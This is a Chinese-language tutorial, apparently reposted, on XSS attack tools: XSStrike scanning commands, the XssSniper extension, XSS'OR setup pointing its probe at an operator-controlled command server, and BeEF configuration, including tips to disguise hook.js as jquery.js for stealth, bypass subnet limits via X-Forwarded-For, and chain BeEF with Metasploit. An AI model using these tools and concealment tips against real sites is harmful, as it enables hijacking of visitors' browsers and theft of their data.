XSS 工具


XSStrike

簡介

XSStrike 是一款用於探測並利用XSS漏洞的腳本,XSStrike 支持 GET/POST 方式,支持對參數進行模糊測試后構建合適的 payload,內置爬蟲功能,支持檢測並嘗試繞過 WAF

安裝

git clone https://github.com/UltimateHackers/XSStrike/
cd XSStrike
pip install -r requirements.txt

配置

使用

XSStrike 基於 Python3

usage: xsstrike.py [-h] [-u TARGET] [--data DATA] [-t THREADS] [--seeds SEEDS] [--json] [--path] [--fuzzer] [--update] [--timeout] [--params] [--crawl] [--blind] [--skip-dom] [--headers] [--proxy] [-d DELAY] [-e ENCODING]
 
optional arguments:
  -h, --help            顯示幫助信息
  -v					顯示詳細輸出
  -u, --url             指定目標URL
  -f, --file            指定自定義payload字典文件
  -t, --threads         指定線程數
  -l, --level           指定爬行深度
  -t, --encode          指定payload編碼方式
  --data                指定POST方式提交內容
  --json                指定POST內容為JSON格式
  --path                inject payloads in the path
  --seeds               加載URL列表文件
  --fuzzer              模糊測試
  --update              檢查更新
  --timeout             指定超時時間
  --params              查找隱藏的參數
  --crawl               爬蟲模式
  --proxy               代理模式
  --blind               XSS盲注
  --skip                skip confirmation dialogue and poc
  --skip-dom            跳過DOM XSS掃描
  --headers             指定HTTP表頭
  -d, --delay           指定請求間隔

GET 方式

python xsstrike.py -u "http://example.com/search.php?q=query"

POST 方式

python xsstrike.py -u "http://example.com/search.php" --data "q=query"
python xsstrike.py -u "http://example.com/search.php" --data '{"q":"query"}‘ --json

指定URL文件

python xsstrike.py --seeds urls.txt

爬蟲模式

python xsstrike.py -u "http://example.com/page.php" --crawl -l 3	# 指定爬行深度

fuzzer 模式

python xsstrike.py -u "http://example.com/search.php?q=query" --fuzzer

附錄

XssSniper

描述

一直以來,隱式輸出的 DomXSS 漏洞難以被傳統的掃描工具發現,XssSniper 是依托於 Chrome瀏 覽器的擴展,通過動態解析可以快速准確的發現DomXSS漏洞。

此外,本擴展不僅可以發現隱式輸出的XSS,還可以發現顯示輸出的DomXSS,反射式XSS,自動尋找JSONP的XSS,以及檢測SOME漏洞(同源方法執行)

原理

XssSniper 擴展會在當前頁面中創建一個隱形的 iframe,在這個 iframe 中采用不同字符組合截斷的payload 去 fuzz 當前頁面中的每個 url 參數,以及 location.hash 參數。如果 payload 執行,說明漏洞一定存在。但如果 XSS 比較隱蔽,或者需要非常復雜的字符組合來截斷的話,payload 可能無法執行,盡管如此,payload 可能會引發一些 js 語法異常,XssSniper 擴展會檢測這些異常,然后提示用戶錯誤位置,錯誤內容,錯誤的行數

XSS'OR

描述

XSS'OR V2是一款免費開源的XSS 黑客工具, 是XSS'OR的升級版本

它包含三個主要模塊:Encode/Decode,Codz,Probe,即編碼/解碼,代碼,探針功能

安裝

https://xssor.io/

git clone https://github.com/evilcos/xssor2
cd xssor2
 
# 修改 xssor/payload/probe.js
xssor.cmd_url = location.protocol + '//xssor.io/cmd'; // 網址替換成你的域名或IP

pip install -r requirement.txt
python manage.py runserver 0.0.0.0:8000

BeEF

安裝

BeEF( The Browser Exploitation Framework) 是由Wade Alcorn 在2006年開始創建的,至今還在維護。是由ruby語言開發的專門針對瀏覽器攻擊的框架。這個框架也屬於cs的結構

12.png

安裝

apt-get install beef-xss

使用

beef-xss
systemctl start beef-xss    	#開啟beef
systemctl stop beef-xss     	#關閉beef
systemctl restart beef-xss  	#重啟beef

http://127.0.0.1:3000/ui/authentication

配置

基本配置

/usr/share/beef-xss/config.yaml

# 指定某個網段,只有在這個網段的瀏覽器才能被hook
permitted_hooking_subnet: "0.0.0.0/0"
# 指定某個網段,只有在這個網段的瀏覽器才能訪問管理UI
permitted_ui_subnet: "0.0.0.0/0"
# 上面這兩項都是可以被繞過的,只要使用 X-Forwarded-For 首部繞過

#  設置beef服務器的主機/域名
host: "0.0.0.0"
#  設置beef服務器監聽的端口 (>1024)
port: "3000"

# 受害瀏覽器輪詢beef主機的時間, 默認為1秒,可以設置為更低
xhr_poll_timeout: 1000
# 管理頁面的URI, 默認為/ui, 建議修改,這樣就不會讓別人找到你的管理頁面
web_ui_basepath: "/ui"
# hook_file 的名稱, 建議修改,可以修改為jquery.js之類的來提升隱蔽性
hook_file: "/hook.js"

# 管理頁面登錄的用戶名和密碼, 建議修改
credentials:
     user:   "beef"
     passwd: "beef"

聯動配置

/usr/share/beef-xss/config.yaml

extension:
	metasploit: 
		enable: true

/usr/share/beef-xss/extensions/metasploit/config/yaml

image-20200507175406607

打開 msfconsole

$ msfconsole
$ load msgrpc ServerHost=127.0.0.1 Pass=abc123

重啟 beef

beef-xss


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM